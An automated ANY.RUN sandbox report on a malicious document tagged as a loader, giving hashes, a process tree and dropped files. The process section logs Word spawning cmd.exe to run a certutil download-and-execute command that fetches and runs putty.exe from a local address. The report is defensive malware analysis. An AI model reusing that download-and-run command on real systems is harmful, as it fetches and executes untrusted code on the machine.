analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

906aea55b24ffa554b35edd8af75345e22d24bf7e1447a07138ec9d14eca177d

Full analysis: https://app.any.run/tasks/4a8528fe-5059-459b-ab6e-4d36d81f2b09
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 02, 2019, 19:19:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/octet-stream
File info: data
MD5:

D219855E68D9FEDA83E7F847D5B50B44

SHA1:

5318E9ECD6AFE4ECE8B7D2C301B34744A06844DC

SHA256:

906AEA55B24FFA554B35EDD8AF75345E22D24BF7E1447A07138EC9D14ECA177D

SSDEEP:

24576:XGMrS5v1HHULNVM6lY/lOXQ1/lj3+i29DmvIyCX8:X9VdlMAIzoX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2256)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2256)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 2456)
      • cmd.exe (PID: 2200)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 1248)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2256)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2256)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.tss | T'SoundSystem Source (with rem) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs certutil.exe certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
1248"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\906aea55b24ffa554b35edd8af75345e22d24bf7e1447a07138ec9d14eca177d.tssC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2256"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\906aea55b24ffa554b35edd8af75345e22d24bf7e1447a07138ec9d14eca177d.tss"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2200"C:\Windows\System32\cmd.exe" /c certutil -urlcache -split -f ^http://127.0.0.1/putty.exe & putty.exeC:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2456"C:\Windows\System32\cmd.exe" /c certutil -urlcache -split -f ^http://127.0.0.1/putty.exe & putty.exeC:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2880certutil -urlcache -split -f http://127.0.0.1/putty.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954429
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1584certutil -urlcache -split -f http://127.0.0.1/putty.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954429
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 277
Read events
1 511
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2256WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR1D61.tmp.cvr
MD5:
SHA256:
2256WINWORD.EXEC:\Users\admin\AppData\Local\Temp\XK112MLTHRV4HRT.sctxml
MD5:EEDD4DB77EBD3C9EFE0E2FE0A4669B56
SHA256:13A47ADD1C783CD2E044B0ADB8E363F9F95C1A45F31CF809DD45E7421BF11136
2256WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1FA6D656F5E7A09E0B03C7B9D06CED1E
SHA256:4557F9B45F47AC1C3F8BF7C11F0AF2A0D884B2130138CC9A4F10337044FA7BB1
2256WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$6aea55b24ffa554b35edd8af75345e22d24bf7e1447a07138ec9d14eca177d.tsspgc
MD5:774615C569EB33BEDC8F93930172D15D
SHA256:8010DE3EDCEF7F0A3525E330DA12DC905A5F36B4544B33240E62CAE7104A395B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info